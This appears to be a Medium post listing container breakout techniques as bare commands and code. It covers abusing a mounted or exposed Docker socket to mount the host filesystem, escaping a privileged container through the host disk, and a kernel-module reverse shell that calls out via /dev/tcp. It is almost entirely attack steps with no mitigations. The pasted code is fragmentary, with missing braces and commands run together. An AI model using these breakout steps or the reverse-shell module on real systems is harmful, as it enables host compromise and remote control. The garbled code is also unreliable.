Container Security-Common issues

A) Docker unix socket mounted in container/Docker tcp socket exposed(Container Breakout-1)-

netstat -a -p --unix | grep docker
docker run -it -v /run/docker.sock:/var/docker.sock --name alpine1 alpine sh
find / -name docker.sock
curl --unix-socket /var/docker.sock -H "Content-Type: application/json" \                                                                                                                                                                 
> -d '{"Image": "alpine", "Cmd": ["echo", "hello world"]}' \
> -X POST http://localhost/v1.41/containers/create
curl --unix-socket /var/docker.sock -X POST http://localhost/v1.41/containers/041f3911456cf552ee1643ccffea3a0e272587a6880fd6b349331d83fd72d18e/startcurl --unix-socket /var/docker.sock -X POST http://localhost/v1.41/containers/041f3911456cf552ee1643ccffea3a0e272587a6880fd6b349331d83fd72d18e/wait
tar -xvf docker-20.10.9.tgz
python3 -m http.server 80
curl --output docker_cli
chmod +x docker_cli
./docker_cli -H unix:///var/docker.sock run -it -v /:/host_fs/ ubuntu bash
chroot /host_fs/ bash
/usr/sbin/dockerd -H tcp://
docker -H tcp:// run --net=host -it ubuntu sh
./docker -H tcp:// run -it -v /:/host_fs/ ubuntu bash
chroot /host_fs/ bash

B) Privileged container or all capabilities allowed(Container breakout-2)-

--privileged OR--cap-add=all
mount /dev/sda1 /mnt
chroot /mnt bash

C) Exploiting capabilities-

ps -aux
cat /proc/1/status | grep Cap
capsh --decode=00000000a80525fb
sudo apt-get install -y build-essential linux-headers-$(uname -r)
hostname -i
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/kmod.h>
MODULE_DESCRIPTION("LKM reverse shell module");
static char command[] = "bash -i >& /dev/tcp/ 0>&1"; //Reverse shell change ip and port if needed

char *argv[] = {
"-c", // flag make command run from option list
command, // Reverse shell
NULL // End of the list
static char *envp[] = {
NULL // End of the list

static int __init connect_back_init(void)

return call_usermodehelper(
argv[0], // execution path
argv, // arguments for process
envp, // environment for process
UMH_WAIT_EXEC // don't wait for program return status

static void __exit connect_back_exit(void)
printk(KERN_INFO "Exiting\n");

obj-m += reverseshell_module.o

make -C /lib/modules/$(shell uname -r)/build M=$(shell pwd) modules

make -C /lib/modules/$(shell uname -r)/build M=$(shell pwd) clean
chmod +x rev_module.ko; insmod rev_module.ko



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store